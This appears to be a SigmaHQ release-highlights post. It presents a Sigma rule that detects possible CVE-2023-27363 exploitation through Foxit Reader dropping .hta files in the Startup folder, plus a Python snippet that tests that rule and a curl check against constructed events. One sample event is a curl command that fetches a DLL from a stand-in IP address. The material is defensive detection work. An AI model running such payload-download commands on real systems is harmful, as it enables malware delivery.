SigmaHQ Rules Release Highlights — r2023-10-23
<p>Sigma Rule Packages for 23-10-2023 are released and available for <a href="https://github.com/SigmaHQ/sigma/releases/tag/r2023-10-23" rel="noopener ugc nofollow" target="_blank">download</a>. This release saw the addition of <strong>21 new rules</strong>, <strong>17 rule updates </strong>and <strong>24 rule fixes.</strong></p>
<h1>New Rules</h1>
<p>Some highlights among the new rules include a detection for CVE-2023-27363 (Remote Code Execution in Foxit Reader), based on <code>.hta</code> file creation in the Startup directory by the Foxit Reader process.</p>
<pre>
title: Potential CVE-2023-27363 Exploitation - HTA File Creation By FoxitPDFReader
id: 9cae055f-e1d2-4f81-b8a5-1986a68cdd84
status: experimental
description: Detects suspicious ".hta" file creation in the startup folder by Foxit Reader. This can be an indication of CVE-2023-27363 exploitation.
references:
    - https://github.com/j00sean/SecBugs/tree/ff72d553f75d93e1a0652830c0f74a71b3f19c46/CVEs/CVE-2023-27363
    - https://www.zerodayinitiative.com/advisories/ZDI-23-491/
    - https://www.tarlogic.com/blog/cve-2023-27363-foxit-reader/
author: Gregory
date: 2023/10/11
tags:
    - attack.persistence
    - attack.t1505.001
    - cve.2023.27363
logsource:
    product: windows
    category: file_event
detection:
    selection:
        Image|endswith: '\FoxitPDFReader.exe'
        TargetFilename|contains: '\Microsoft\Windows\Start Menu\Programs\Startup\'
        TargetFilename|endswith: '.hta'
    condition: selection
falsepositives:
    - Unknown
level: high</pre>
<p>Also new is a generic rule that detects the use of curl to download files from IP-based URLs, as <a href="https://github.com/pr0xylife/IcedID/blob/main/icedID_09.28.2023.txt" rel="noopener ugc nofollow" target="_blank">seen</a> being abused in the <a href="https://tria.ge/230928-shv6tsdf67/behavioral1" rel="noopener ugc nofollow" target="_blank">wild</a>.</p>
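<p>To make the matching semantics of both rules concrete, the following Python snippet is an added example (written for this page, not code from SigmaHQ or any Sigma backend). It evaluates the <code>selection</code> block of the HTA rule above with Sigma's default case-insensitive <code>endswith</code>/<code>contains</code> modifiers, and applies the same idea to the curl rule: since the page does not reproduce that rule's YAML, the check used here (image ends with <code>\curl.exe</code> and the command line carries a URL whose host parses as an IP address) is the editor's assumption of how such a detection can be expressed, not the published rule. All event records are constructed sample data.</p>

```python
import re
from ipaddress import ip_address
from urllib.parse import urlparse

# Constructed Windows file_event records (Sysmon event ID 11 style fields), not real telemetry.
FILE_EVENTS = [
    {"Image": "C:\\Program Files (x86)\\Foxit Software\\Foxit PDF Reader\\FoxitPDFReader.exe",
     "TargetFilename": "C:\\Users\\alice\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\update.hta"},
    {"Image": "C:\\Program Files (x86)\\Foxit Software\\Foxit PDF Reader\\FoxitPDFReader.exe",
     "TargetFilename": "C:\\Users\\alice\\Documents\\report.pdf"},
    {"Image": "C:\\Windows\\explorer.exe",
     "TargetFilename": "C:\\Users\\alice\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\notes.hta"},
]

# Constructed process_creation records for the curl example, not real telemetry.
PROCESS_EVENTS = [
    {"Image": "C:\\Windows\\System32\\curl.exe",
     "CommandLine": "curl.exe -o C:\\Users\\Public\\a.dll http://203.0.113.10/a.dll"},
    {"Image": "C:\\Windows\\System32\\curl.exe",
     "CommandLine": "curl https://example.com/file.txt -O"},
    {"Image": "C:\\Windows\\System32\\cmd.exe",
     "CommandLine": "cmd /c echo http://203.0.113.10/x"},
]

# The selection block of the HTA rule above, as (field, modifier, value) triples.
HTA_SELECTION = [
    ("Image", "endswith", "\\FoxitPDFReader.exe"),
    ("TargetFilename", "contains", "\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\"),
    ("TargetFilename", "endswith", ".hta"),
]


def match_modifier(actual, modifier, value):
    """Apply one Sigma string modifier; Sigma matching is case-insensitive by default."""
    a, v = actual.lower(), value.lower()
    if modifier == "endswith":
        return a.endswith(v)
    if modifier == "startswith":
        return a.startswith(v)
    if modifier == "contains":
        return v in a
    raise ValueError("unsupported modifier: " + modifier)


def selection_matches(event, selection):
    """All field conditions inside one Sigma selection map are AND-ed together."""
    return all(match_modifier(event.get(field, ""), mod, val) for field, mod, val in selection)


def hta_alerts(events):
    """Return the TargetFilename of every file event matching the HTA rule's selection."""
    return [e["TargetFilename"] for e in events if selection_matches(e, HTA_SELECTION)]


URL_RE = re.compile(r"https?://[^\s\"']+", re.IGNORECASE)


def is_ip_host(url):
    """True when the URL's host component is a literal IPv4/IPv6 address rather than a name."""
    host = urlparse(url).hostname
    if host is None:
        return False
    try:
        ip_address(host)
        return True
    except ValueError:
        return False


def curl_ip_download(event):
    """Assumed shape of the curl check: curl.exe image plus at least one IP-hosted URL argument."""
    if not match_modifier(event.get("Image", ""), "endswith", "\\curl.exe"):
        return False
    return any(is_ip_host(u) for u in URL_RE.findall(event.get("CommandLine", "")))


def curl_alerts(events):
    """Return the CommandLine of every process event flagged by the assumed curl check."""
    return [e["CommandLine"] for e in events if curl_ip_download(e)]


if __name__ == "__main__":
    print("HTA rule hits:", hta_alerts(FILE_EVENTS))
    print("curl IP-URL hits:", curl_alerts(PROCESS_EVENTS))
```

<p>Running the snippet flags only the first record in each list: the <code>.hta</code> written to the Startup folder by <code>explorer.exe</code> is not matched because the rule also requires the Foxit image, and the <code>cmd.exe</code> record carrying an IP URL is ignored because the image condition fails first.</p>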
<p><a href="https://blog.sigmahq.io/sigmahq-rule-release-highlights-r2023-10-23-56eb16a3a882"><strong>Read More</strong></a></p>